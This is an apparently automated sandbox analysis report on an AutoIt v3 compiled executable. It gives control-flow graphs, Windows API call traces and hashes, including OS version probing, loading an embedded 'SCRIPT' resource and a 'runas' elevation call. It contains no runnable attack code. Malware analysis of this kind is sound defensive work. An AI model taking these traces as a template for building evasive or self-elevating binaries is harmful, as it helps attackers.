                control_flow_graph 234 1142de-11434d call 11a961 GetVersionExW call 116b57 239 153617-15362a 234->239 240 114353 234->240 242 15362b-15362f 239->242 241 114355-114357 240->241 245 153656 241->245 246 11435d-1143bc call 1193b2 call 1137a0 241->246 243 153631 242->243 244 153632-15363e 242->244 243->244 244->242 247 153640-153642 244->247 250 15365d-153660 245->250 263 1143c2-1143c4 246->263 264 1537df-1537e6 246->264 247->241 249 153648-15364f 247->249 249->239 252 153651 249->252 253 153666-1536a8 250->253 254 11441b-114435 GetCurrentProcess IsWow64Process 250->254 252->245 253->254 258 1536ae-1536b1 253->258 256 114494-11449a 254->256 257 114437 254->257 260 11443d-114449 256->260 257->260 261 1536b3-1536bd 258->261 262 1536db-1536e5 258->262 265 153824-153828 GetSystemInfo 260->265 266 11444f-11445e LoadLibraryA 260->266 267 1536bf-1536c5 261->267 268 1536ca-1536d6 261->268 270 1536e7-1536f3 262->270 271 1536f8-153702 262->271 263->250 269 1143ca-1143dd 263->269 272 153806-153809 264->272 273 1537e8 264->273 279 114460-11446e GetProcAddress 266->279 280 11449c-1144a6 GetSystemInfo 266->280 267->254 268->254 281 1143e3-1143e5 269->281 282 153726-15372f 269->282 270->254 275 153715-153721 271->275 276 153704-153710 271->276 277 1537f4-1537fc 272->277 278 15380b-15381a 272->278 274 1537ee 273->274 274->277 275->254 276->254 277->272 278->274 287 15381c-153822 278->287 279->280 288 114470-114474 GetNativeSystemInfo 279->288 289 114476-114478 280->289 283 15374d-153762 281->283 284 1143eb-1143ee 281->284 285 153731-153737 282->285 286 15373c-153748 282->286 292 153764-15376a 283->292 293 15376f-15377b 283->293 290 153791-153794 284->290 291 1143f4-11440f 284->291 285->254 286->254 287->277 288->289 294 114481-114493 289->294 295 11447a-11447b FreeLibrary 289->295 290->254 298 15379a-1537c1 290->298 296 114415 291->296 297 153780-15378c 291->297 292->254 293->254 295->294 296->254 297->254 299 1537c3-1537c9 298->299 300 1537ce-1537da 298->300 299->254 300->254
                APIs
                • GetVersionExW.KERNEL32(?), ref: 0011430D
                  • Part of subcall function 00116B57: _wcslen.LIBCMT ref: 00116B6A
                • GetCurrentProcess.KERNEL32(?,001ACB64,00000000,?,?), ref: 00114422
                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00114429
                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00114454
                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00114466
                • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00114474
                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0011447B
                • GetSystemInfo.KERNEL32(?,?,?), ref: 001144A0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                • API String ID: 3290436268-3101561225
                • Opcode ID: 748f170faf2c8b2e4f9fac8dbbc1c7ec9c3464d1d24a6bec13762d39d4240557
                • Instruction ID: 67385446f9f89ebad980138ab2f914aa52b08c8505828cb999e875150228a19a
                • Opcode Fuzzy Hash: 748f170faf2c8b2e4f9fac8dbbc1c7ec9c3464d1d24a6bec13762d39d4240557
                • Instruction Fuzzy Hash: 43A1927690A2C0EFC719C7EA78C15DD7FA47B26B61B1848A9D4519FE22D3304AC8CB71
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001142A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 644 1142a2-1142ba CreateStreamOnHGlobal 645 1142da-1142dd 644->645 646 1142bc-1142d3 FindResourceExW 644->646 647 1142d9 646->647 648 1535ba-1535c9 LoadResource 646->648 647->645 648->647 649 1535cf-1535dd SizeofResource 648->649 649->647 650 1535e3-1535ee LockResource 649->650 650->647 651 1535f4-153612 650->651 651->647
                APIs
                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,001150AA,?,?,00000000,00000000), ref: 001142B2
                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001150AA,?,?,00000000,00000000), ref: 001142C9
                • LoadResource.KERNEL32(?,00000000,?,?,001150AA,?,?,00000000,00000000,?,?,?,?,?,?,00114F20), ref: 001535BE
                • SizeofResource.KERNEL32(?,00000000,?,?,001150AA,?,?,00000000,00000000,?,?,?,?,?,?,00114F20), ref: 001535D3
                • LockResource.KERNEL32(001150AA,?,?,001150AA,?,?,00000000,00000000,?,?,?,?,?,?,00114F20,?), ref: 001535E6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                • String ID: SCRIPT
                • API String ID: 3051347437-3967369404
                • Opcode ID: 35446feb399535b0c235ad2f973350ef9696f18b09a39c4b788b009944339cd9
                • Instruction ID: 24b94e386d054d8b553e0432767dfa9fe33659e3309c4b9aa0586b2217521a96
                • Opcode Fuzzy Hash: 35446feb399535b0c235ad2f973350ef9696f18b09a39c4b788b009944339cd9
                • Instruction Fuzzy Hash: A6118E74200700BFD7258B65EC48F6B7BBAEBC6B51F104169F452D6650DB71DC808A70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00152BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00112B6B
                  • Part of subcall function 00113A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001E1418,?,00112E7F,?,?,?,00000000), ref: 00113A78
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • GetForegroundWindow.USER32(runas,?,?,?,?,?,001D2224), ref: 00152C10
                • ShellExecuteW.SHELL32(00000000,?,?,001D2224), ref: 00152C17
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                • String ID: runas
                • API String ID: 448630720-4000483414
                • Opcode ID: 504e2d41ef6337e4cbd96c7441548c5aca642b1dbd2465d0d1e943854a336eb9
                • Instruction ID: 85f863dd578b7a354b6bd61b1a819049d56e83718d45a24fa799cadcaef43d55
                • Opcode Fuzzy Hash: 504e2d41ef6337e4cbd96c7441548c5aca642b1dbd2465d0d1e943854a336eb9
                • Instruction Fuzzy Hash: 0F11D6312083456AC71CFF60E8919FEB7A4AFB6350F44143DF1A2561A2CF319AC9D752
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0017DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                Download Yara Rule
                APIs
                • lstrlenW.KERNEL32(?,00155222), ref: 0017DBCE
                • GetFileAttributesW.KERNELBASE(?), ref: 0017DBDD
                • FindFirstFileW.KERNELBASE(?,?), ref: 0017DBEE
                • FindClose.KERNEL32(00000000), ref: 0017DBFA
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FileFind$AttributesCloseFirstlstrlen
                • String ID:
                • API String ID: 2695905019-0
                • Opcode ID: 73daa6d1d4107bd8bd9ac3f6ca5b714391b6803861fff69dc3c196fed47e0404
                • Instruction ID: 8563f46e619ae25d6776cf5b43e6e4d5a115282c8fbe0e4e6a591b6496655551
                • Opcode Fuzzy Hash: 73daa6d1d4107bd8bd9ac3f6ca5b714391b6803861fff69dc3c196fed47e0404
                • Instruction Fuzzy Hash: CDF0A930810918A782216B78AC0D8AA37BD9F03334B10870AF83AC24E0EBB09D9486D6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0011D730 Relevance: 21.6, APIs: 14, Instructions: 625windowsleeptimeCOMMON
                Download Yara Rule
                APIs
                • GetInputState.USER32 ref: 0011D807
                • timeGetTime.WINMM ref: 0011DA07
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0011DB28
                • TranslateMessage.USER32(?), ref: 0011DB7B
                • DispatchMessageW.USER32(?), ref: 0011DB89
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0011DB9F
                • Sleep.KERNEL32(0000000A), ref: 0011DBB1
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                • String ID:
                • API String ID: 2189390790-0
                • Opcode ID: 3599b8c400433f3fe9a05e7c0b7975ae6cc11672bae0c6917c36823dfabba346
                • Instruction ID: bae8d6837c713a5a6e19fa0e8c3a47b61f70541fdc520bbcaa221d1924beb0ac
                • Opcode Fuzzy Hash: 3599b8c400433f3fe9a05e7c0b7975ae6cc11672bae0c6917c36823dfabba346
                • Instruction Fuzzy Hash: E942F130608741EFD72DCF24E884BAAB7E0BF56314F15852DE4968B691D7B4E8D4CB82
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00112CD4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53windowregistryCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 00112D07
                • RegisterClassExW.USER32(00000030), ref: 00112D31
                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00112D42
                • InitCommonControlsEx.COMCTL32(?), ref: 00112D5F
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00112D6F
                • LoadIconW.USER32(000000A9), ref: 00112D85
                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00112D94
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                • String ID: +$0$@5$AutoIt v3 GUI$TaskbarCreated
                • API String ID: 2914291525-3252143117
                • Opcode ID: fd33a4f057e1a8af2718b703646085b7ca3ab56137726dc5729ff5f285761d1e
                • Instruction ID: bd73ecfc064f162fa8089a07fd1b5809d2fc8f59eeeb39376f4ab3229fdf7ca4
                • Opcode Fuzzy Hash: fd33a4f057e1a8af2718b703646085b7ca3ab56137726dc5729ff5f285761d1e
                • Instruction Fuzzy Hash: 7B21C3B5901258AFDB00DFE4E989BDDBBB4FB09714F00811AF511AA6A0D7B54584CF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0015065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 302 15065b-15068b call 15042f 305 1506a6-1506b2 call 145221 302->305 306 15068d-150698 call 13f2c6 302->306 311 1506b4-1506c9 call 13f2c6 call 13f2d9 305->311 312 1506cb-150714 call 15039a 305->312 313 15069a-1506a1 call 13f2d9 306->313 311->313 321 150716-15071f 312->321 322 150781-15078a GetFileType 312->322 323 15097d-150983 313->323 327 150756-15077c GetLastError call 13f2a3 321->327 328 150721-150725 321->328 324 1507d3-1507d6 322->324 325 15078c-1507bd GetLastError call 13f2a3 CloseHandle 322->325 331 1507df-1507e5 324->331 332 1507d8-1507dd 324->332 325->313 339 1507c3-1507ce call 13f2d9 325->339 327->313 328->327 333 150727-150754 call 15039a 328->333 336 1507e9-150837 call 14516a 331->336 337 1507e7 331->337 332->336 333->322 333->327 344 150847-15086b call 15014d 336->344 345 150839-150845 call 1505ab 336->345 337->336 339->313 352 15086d 344->352 353 15087e-1508c1 344->353 345->344 351 15086f-150879 call 1486ae 345->351 351->323 352->351 355 1508c3-1508c7 353->355 356 1508e2-1508f0 353->356 355->356 358 1508c9-1508dd 355->358 359 1508f6-1508fa 356->359 360 15097b 356->360 358->356 359->360 361 1508fc-15092f CloseHandle call 15039a 359->361 360->323 364 150931-15095d GetLastError call 13f2a3 call 145333 361->364 365 150963-150977 361->365 364->365 365->360
                APIs
                  • Part of subcall function 0015039A: CreateFileW.KERNELBASE(00000000,00000000,?,00150704,?,?,00000000,?,00150704,00000000,0000000C), ref: 001503B7
                • GetLastError.KERNEL32 ref: 0015076F
                • __dosmaperr.LIBCMT ref: 00150776
                • GetFileType.KERNELBASE(00000000), ref: 00150782
                • GetLastError.KERNEL32 ref: 0015078C
                • __dosmaperr.LIBCMT ref: 00150795
                • CloseHandle.KERNEL32(00000000), ref: 001507B5
                • CloseHandle.KERNEL32(?), ref: 001508FF
                • GetLastError.KERNEL32 ref: 00150931
                • __dosmaperr.LIBCMT ref: 00150938
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                • String ID: H
                • API String ID: 4237864984-2852464175
                • Opcode ID: a8be6f615e05bc767fc3184c7b159935232cbf032b3b15397b8506b70545e0df
                • Instruction ID: abb50ac3971bc6ec2e20a1ac422e43a9dce13e92e63b1f108e496e69e788d332
                • Opcode Fuzzy Hash: a8be6f615e05bc767fc3184c7b159935232cbf032b3b15397b8506b70545e0df
                • Instruction Fuzzy Hash: E1A11732A00144CFDF1AAFA8D891BAE7BA0AB1A325F14015DFC259F391DB319D57CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0011344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                  • Part of subcall function 00113A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001E1418,?,00112E7F,?,?,?,00000000), ref: 00113A78
                  • Part of subcall function 00113357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00113379
                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0011356A
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0015318D
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001531CE
                • RegCloseKey.ADVAPI32(?), ref: 00153210
                • _wcslen.LIBCMT ref: 00153277
                • _wcslen.LIBCMT ref: 00153286
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                • API String ID: 98802146-2727554177
                • Opcode ID: 27cb93dca224fd1ed2266dd910aa8d54defa03cc5e7dddc604488bfc95250ae6
                • Instruction ID: 4ec42dd5af27266eff69a189f6251b3dccc6bd164cf8e2c54a62973e76b60ab6
                • Opcode Fuzzy Hash: 27cb93dca224fd1ed2266dd910aa8d54defa03cc5e7dddc604488bfc95250ae6
                • Instruction Fuzzy Hash: E4719E715043449EC318DFA5EC929AFBBE8FF99740F40042EF5559B1A0EB709A89CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00112B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 00112B8E
                • LoadCursorW.USER32(00000000,00007F00), ref: 00112B9D
                • LoadIconW.USER32(00000063), ref: 00112BB3
                • LoadIconW.USER32(000000A4), ref: 00112BC5
                • LoadIconW.USER32(000000A2), ref: 00112BD7
                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00112BEF
                • RegisterClassExW.USER32(?), ref: 00112C40
                  • Part of subcall function 00112CD4: GetSysColorBrush.USER32(0000000F), ref: 00112D07
                  • Part of subcall function 00112CD4: RegisterClassExW.USER32(00000030), ref: 00112D31
                  • Part of subcall function 00112CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00112D42
                  • Part of subcall function 00112CD4: InitCommonControlsEx.COMCTL32(?), ref: 00112D5F
                  • Part of subcall function 00112CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00112D6F
                  • Part of subcall function 00112CD4: LoadIconW.USER32(000000A9), ref: 00112D85
                  • Part of subcall function 00112CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00112D94
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                • String ID: #$0$AutoIt v3
                • API String ID: 423443420-4155596026
                • Opcode ID: 3e3ebe15430b94209254af83f21daa8e21ea28585f1a1e78e293caaff195ed85
                • Instruction ID: c71e8c28bc0b43ce0832ed4e7e5e82ba7fa2756cf02f39c2d7b291a292df611e
                • Opcode Fuzzy Hash: 3e3ebe15430b94209254af83f21daa8e21ea28585f1a1e78e293caaff195ed85
                • Instruction Fuzzy Hash: 56210974E00358BBDB109FE5EC95AAD7FB4FB48B60F04002AF500AAAA0D7B115C0CF90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00113170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 443 113170-113185 444 1131e5-1131e7 443->444 445 113187-11318a 443->445 444->445 446 1131e9 444->446 447 1131eb 445->447 448 11318c-113193 445->448 449 1131d0-1131d8 DefWindowProcW 446->449 450 1131f1-1131f6 447->450 451 152dfb-152e23 call 1118e2 call 12e499 447->451 452 113265-11326d PostQuitMessage 448->452 453 113199-11319e 448->453 459 1131de-1131e4 449->459 454 1131f8-1131fb 450->454 455 11321d-113244 SetTimer RegisterWindowMessageW 450->455 489 152e28-152e2f 451->489 460 113219-11321b 452->460 457 1131a4-1131a8 453->457 458 152e7c-152e90 call 17bf30 453->458 461 113201-113214 KillTimer call 1130f2 call 113c50 454->461 462 152d9c-152d9f 454->462 455->460 464 113246-113251 CreatePopupMenu 455->464 465 152e68-152e77 call 17c161 457->465 466 1131ae-1131b3 457->466 458->460 484 152e96 458->484 460->459 461->460 468 152dd7-152df6 MoveWindow 462->468 469 152da1-152da5 462->469 464->460 465->460 473 152e4d-152e54 466->473 474 1131b9-1131be 466->474 468->460 476 152da7-152daa 469->476 477 152dc6-152dd2 SetFocus 469->477 473->449 478 152e5a-152e63 call 170ad7 473->478 482 113253-113263 call 11326f 474->482 483 1131c4-1131ca 474->483 476->483 485 152db0-152dc1 call 1118e2 476->485 477->460 478->449 482->460 483->449 483->489 484->449 485->460 489->449 493 152e35-152e48 call 1130f2 call 113837 489->493 493->449
                APIs
                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0011316A,?,?), ref: 001131D8
                • KillTimer.USER32(?,00000001,?,?,?,?,?,0011316A,?,?), ref: 00113204
                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00113227
                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0011316A,?,?), ref: 00113232
                • CreatePopupMenu.USER32 ref: 00113246
                • PostQuitMessage.USER32(00000000), ref: 00113267
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                • String ID: TaskbarCreated
                • API String ID: 129472671-2362178303
                • Opcode ID: 99350d263acf1894963008e350d130bea257480bea31d1ce2530c61fdc9e2461
                • Instruction ID: b69d57e631b195b614431435d583b17098e465eabc0d725e219317877d38b76d
                • Opcode Fuzzy Hash: 99350d263acf1894963008e350d130bea257480bea31d1ce2530c61fdc9e2461
                • Instruction Fuzzy Hash: 72412936340244BBDB1D7BB89D4DBFD366AE706354F040135F9329A9A5CB718AC097A1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00148D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 499 148d45-148d55 500 148d57-148d6a call 13f2c6 call 13f2d9 499->500 501 148d6f-148d71 499->501 517 1490f1 500->517 503 148d77-148d7d 501->503 504 1490d9-1490e6 call 13f2c6 call 13f2d9 501->504 503->504 507 148d83-148dae 503->507 522 1490ec call 1427ec 504->522 507->504 510 148db4-148dbd 507->510 513 148dd7-148dd9 510->513 514 148dbf-148dd2 call 13f2c6 call 13f2d9 510->514 515 1490d5-1490d7 513->515 516 148ddf-148de3 513->516 514->522 521 1490f4-1490f9 515->521 516->515 520 148de9-148ded 516->520 517->521 520->514 525 148def-148e06 520->525 522->517 528 148e23-148e2c 525->528 529 148e08-148e0b 525->529 532 148e2e-148e45 call 13f2c6 call 13f2d9 call 1427ec 528->532 533 148e4a-148e54 528->533 530 148e15-148e1e 529->530 531 148e0d-148e13 529->531 536 148ebf-148ed9 530->536 531->530 531->532 561 14900c 532->561 534 148e56-148e58 533->534 535 148e5b-148e79 call 143820 call 1429c8 * 2 533->535 534->535 569 148e96-148ebc call 149424 535->569 570 148e7b-148e91 call 13f2d9 call 13f2c6 535->570 538 148fad-148fb6 call 14f89b 536->538 539 148edf-148eef 536->539 552 148fb8-148fca 538->552 553 149029 538->553 539->538 542 148ef5-148ef7 539->542 542->538 546 148efd-148f23 542->546 546->538 550 148f29-148f3c 546->550 550->538 557 148f3e-148f40 550->557 552->553 555 148fcc-148fdb GetConsoleMode 552->555 559 14902d-149045 ReadFile 553->559 555->553 560 148fdd-148fe1 555->560 557->538 562 148f42-148f6d 557->562 564 149047-14904d 559->564 565 1490a1-1490ac GetLastError 559->565 560->559 566 148fe3-148ffd ReadConsoleW 560->566 567 14900f-149019 call 1429c8 561->567 562->538 568 148f6f-148f82 562->568 564->565 573 14904f 564->573 571 1490c5-1490c8 565->571 572 1490ae-1490c0 call 13f2d9 call 13f2c6 565->572 576 14901e-149027 566->576 577 148fff GetLastError 566->577 567->521 568->538 581 148f84-148f86 568->581 569->536 570->561 578 149005-14900b call 13f2a3 571->578 579 1490ce-1490d0 571->579 572->561 575 149052-149064 573->575 575->567 586 149066-14906a 575->586 576->575 577->578 578->561 579->567 581->538 589 148f88-148fa8 581->589 592 149083-14908e 586->592 593 14906c-14907c call 148a61 586->593 589->538 598 149090 call 148bb1 592->598 599 14909a-14909f call 1488a1 592->599 604 14907f-149081 593->604 605 149095-149098 598->605 599->605 604->567 605->604
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
